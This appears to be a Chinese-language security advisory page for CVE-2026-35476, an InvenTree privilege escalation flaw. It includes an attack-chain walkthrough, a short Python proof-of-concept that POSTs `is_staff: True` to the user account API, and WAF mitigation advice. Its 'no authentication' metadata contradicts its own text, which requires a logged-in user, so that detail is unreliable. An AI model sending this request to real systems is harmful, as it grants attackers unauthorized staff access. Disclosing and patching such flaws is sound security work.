CVE-2026-35476 CVSS 7.2 高危

CVE-2026-35476 InvenTree权限提升漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35476

漏洞类型

权限提升

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

InvenTree

漏洞概述

InvenTree是一款开源库存管理系统。在1.2.7和1.3.0版本之前，由于API端点写入权限配置不当，经过身份认证的非员工用户可以通过POST请求将自己提升为员工权限，导致权限提升漏洞。该漏洞已在1.2.7和1.3.0版本中修复。

技术细节

该漏洞的核心在于InvenTree后端API对用户敏感属性修改的校验机制缺失。在正常的业务逻辑中，将普通用户升级为“员工”应当仅限于管理员操作。然而，在受影响的版本中（1.2.7和1.3.0之前），系统允许用户直接通过API端点修改自身账户对象。攻击者首先需要注册或通过已有凭证登录InvenTree系统，获取有效的认证Session或Token。随后，攻击者无需任何管理员权限，直接向用户账户端点发送POST请求，请求体中包含 `is_staff: true`。由于服务端未对写操作进行严格的权限隔离，系统直接接受了该修改请求，导致攻击者账户权限被非法提升。利用成功后，攻击者即可利用Staff权限访问后台管理界面，查看敏感库存数据或修改系统配置。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标系统使用的是存在漏洞的InvenTree版本（< 1.2.7 或 < 1.3.0）。

STEP 2

2. 获取凭证

攻击者注册一个新账户或使用现有的普通用户账户登录系统，获取有效的API Token或Session。

STEP 3

3. 发起攻击

攻击者构造包含 `is_staff: true` 的恶意POST请求，发送至用户账户更新接口。

STEP 4

4. 权限提升

由于服务端未校验权限，请求被成功处理，攻击者账户获得员工权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (may vary based on deployment)
target_url = "http://target-domain.com/api/user/account/"

# Attacker's credentials or session token
headers = {
    "Authorization": "Token <YOUR_AUTH_TOKEN>",
    "Content-Type": "application/json"
}

# Payload to exploit the permission misconfiguration
payload = {
    "is_staff": True
}

try:
    # Send POST request to elevate privileges
    response = requests.post(target_url, json=payload, headers=headers)

    if response.status_code == 200:
        print("[+] Privilege escalation successful! User is now staff.")
    else:
        print(f"[-] Failed. Status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"[!] Error: {e}")

影响范围

InvenTree < 1.2.7

InvenTree < 1.3.0

防御指南

临时缓解措施

如果无法立即升级，建议管理员在Web应用防火墙（WAF）中配置规则，拦截针对用户账户API端点的包含 `is_staff` 参数的POST或PATCH请求。同时，应定期审计系统用户列表，及时发现并清理非授权的员工账户。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表